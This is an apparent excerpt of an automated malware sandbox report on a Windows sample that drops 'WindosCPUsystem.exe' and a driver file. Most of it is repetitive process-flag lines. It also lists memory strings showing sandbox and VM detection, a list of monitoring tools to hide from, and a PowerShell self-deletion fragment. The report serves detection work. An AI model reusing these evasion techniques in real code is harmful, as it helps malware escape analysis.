Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\explorer.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: explorer.exe, 00000008.00000003.2194100244.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2804371385.0000000003208000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2804154799.0000000003208000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2215752889.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2216267066.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXE
Source: file.exe, 00000000.00000002.2156184931.000001FB8E176000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: explorer.exe, 00000008.00000003.2193150014.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2215570251.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEG
Source: explorer.exe, 00000008.00000003.2193033170.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2193150014.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2804154799.0000000003213000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "STEALTH-TARGETS": "TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE",
Source: explorer.exe, 00000008.00000003.2804371385.0000000003208000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2804154799.0000000003208000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXE;
Source: file.exe, 00000000.00000002.2156184931.000001FB8E176000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: LDRLOADDLLORTLZEROMEMORY:INVALID PROCESSINFOCLASS: {0}PNTQUERYINFORMATIONPROCESSRNTPROTECTVIRTUALMEMORYJEXPLORER SBIEDLL.DLL!CUCKOOMON.DLL"WIN32_PROCESS.HANDLE='{0}'#PARENTPROCESSID$CMD%SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE&VERSION'SERIALNUMBER)VMWARE\|VIRTUAL\|A M I\|XENSELECT FROM WIN32_COMPUTERSYSTEM+MANUFACTURER,MODEL-MICROSOFT\|VMWARE\|VIRTUAL.JOHN/ANNA0XXXXXXXXFPOWERSHELLVSTART-SLEEP -SECONDS 5; REMOVE-ITEM -PATH '
Source: WindosCPUsystem.exe, 00000009.00000002.3638469569.0000020A5F69C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL2!
Source: WindosCPUsystem.exe, 00000009.00000002.3638469569.0000020A5F69C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: LDRLOADDLLHRTLZEROMEMORY:INVALID PROCESSINFOCLASS: {0}INTQUERYINFORMATIONPROCESSKNTPROTECTVIRTUALMEMORYCEXPLORER SBIEDLL.DLL!CUCKOOMON.DLL"WIN32_PROCESS.HANDLE='{0}'#PARENTPROCESSID$CMD%SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE&VERSION'SERIALNUMBER)VMWARE\|VIRTUAL\|A M I\|XENSELECT FROM WIN32_COMPUTERSYSTEM+MANUFACTURER,MODEL-MICROSOFT\|VMWARE\|VIRTUAL.JOHN/ANNA0XXXXXXXXBPOWERSHELLVSTART-SLEEP -SECONDS 5; REMOVE-ITEM -PATH '
Source: explorer.exe, 00000008.00000003.2193150014.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2215570251.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 1FB8DF60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 1FBA6100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Memory allocated: 20A5DAA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Memory allocated: 20A77630000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5995	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3800	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2180	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 410	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\orupcopicsyv.sys

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
